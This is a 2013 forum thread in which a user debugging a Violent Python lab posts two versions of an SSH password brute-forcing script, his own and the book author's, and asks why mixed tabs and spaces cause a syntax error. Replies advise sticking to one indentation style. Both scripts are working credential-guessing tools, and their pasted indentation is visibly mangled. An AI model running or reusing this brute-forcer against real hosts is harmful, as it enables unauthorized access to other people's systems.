.

Coding frustrations...

<<

Triban

User avatar

Hero Member
Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Wed May 29, 2013 9:03 pm

Coding frustrations...

I've learned some valuable lessons in my path to becoming a better coder.  For one, always spell check.  If something isn't working in your code, make sure similar calls a spelled right <something>.acquire vs <something>.aquire.

I facepalmed when I discovered that little gem.  The next thing that is annoying the crap out of me is the old "tabs vs spaces" rules.  ViolentPython CH2 problem building the SSH Botnet, one of the labs is building an ssh brute forcing script.  The code looks almost exactly the same.  When I wrote it, I chose tabs for all my indentation:
  Code:
import pxssh
import optparse
import time
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)

Found = False
Fails = 0

def connect(host, user, password, release):
   global Found
   global Fails

   try:
      s = pxssh.pxssh()
      s.login(host, user, password)
      print '[+] Password Found: ' + password
   Found = True
   except Exception, e:
      if 'read_nonblocking' in str(e):
      Fails += 1
         time.sleep(5)
         connect(host, user, password, False)
   elif 'synchronize with original prompt' in str(e):
      time.sleep(1)
      connect(host, user, password, False)

   finally:
   if release: connection_lock.release()

def main():
   parser = optparse.OptionParser('usage%prog '+\
      '-H <target host> -u <user> -F <password list>')
   parser.add_option('-H', dest='tgtHost', type='string', \
      help='specify target host')
   parser.add_option('-F', dest='passwdFile', type='string', \
      help='specify the password file')
   parser.add_option('-u', dest='user', type='string', \
      help='specify the user')

   (options, args) = parser.parse_args()

   host = options.tgtHost
   passwdFile = options.passwdFile
   user = options.user

   if host == None or passwdFile == None or user == None:
      print parser.usage
      exit(0)

   fn = open(passwdFile, 'r')
   for line in fn.readlines():
   if Found:
      print "[*] Exiting: Password Found"
      exit(0)
      if Fails > 5:
      print "[!] Exiting: Too Many Socket Timeouts"
      exit(0)

   connection_lock.acquire()
      password = line.strip('\r').strip('\n')

   print "[-] Testing: "+str(password)
      t = Thread(target=connect, args=(host, user, \
         password, True))
      child = t.start()

if __name__ == '__main__':
   main()


Here is the companion script from the author:

  Code:
import pxssh
import optparse
import time
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)

Found = False
Fails = 0

def connect(host, user, password, release):
    global Found
    global Fails

    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+] Password Found: ' + password
   Found = True
    except Exception, e:
        if 'read_nonblocking' in str(e):
       Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
   elif 'synchronize with original prompt' in str(e):
       time.sleep(1)
       connect(host, user, password, False)

    finally:
   if release: connection_lock.release()

def main():
    parser = optparse.OptionParser('usage %prog '+\
      '-H <target host> -u <user> -F <password list>'
                              )
    parser.add_option('-H', dest='tgtHost', type='string',\
      help='specify target host')
    parser.add_option('-F', dest='passwdFile', type='string',\
      help='specify password file')
    parser.add_option('-u', dest='user', type='string',\
      help='specify the user')

    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user

    if host == None or passwdFile == None or user == None:
        print parser.usage
        exit(0)
       
    fn = open(passwdFile, 'r')
    for line in fn.readlines():

   if Found:
       print "[*] Exiting: Password Found"
       exit(0)
        if Fails > 5:
       print "[!] Exiting: Too Many Socket Timeouts"
       exit(0)

   connection_lock.acquire()
        password = line.strip('\r').strip('\n')
   print "[-] Testing: "+str(password)
        t = Thread(target=connect, args=(host, user,\
          password, True))
        child = t.start()

if __name__ == '__main__':
    main()


Looks pretty similar right?  Now throw that into something like Notepad++ and put the "Show all characters" on.  Notice some differences, he chose spaces in most of the code except for some parts.  One in particular is line 20 "Found = True" run it with my code, Syntax Error.  Run his, no problems.  If I switch to all spaces, problem still occurs, if I match his tabs, no problem.  I find it ponderous.  I wrote the my scripts in GEdit, it was originally set to use spaces for indentation, I switched it to tabs due to laziness.  Not sure if it would have made a difference though.

Any thoughts?

HA!  Actually looking at it through this, I can definitely see some differences.  It seems mine has many extra spaces compared to the author's. 
Certs: GCWN
(@)Dewser
<<

Xtophertaito

Post Wed May 29, 2013 11:10 pm

Re: Coding frustrations...

Stick to the one that works and save stress.
Mixing tab and space is the worst thing that can
in any programming language.Goodluck.
<<

Triban

User avatar

Hero Member
Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Thu May 30, 2013 10:09 am

Re: Coding frustrations...

Thanks, I figured that would be the best bet.  What I think happened is that in GEdit and Notepad++ you can set auto-indent, they must have thrown some garbage in there somewhere.  So I turned that feature off.  I think I will rewrite the code from scratch and see what happens.  What I did learn from this is the -t and -tt switches when running the python command.  That is handy.
Certs: GCWN
(@)Dewser

Return to Programming

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software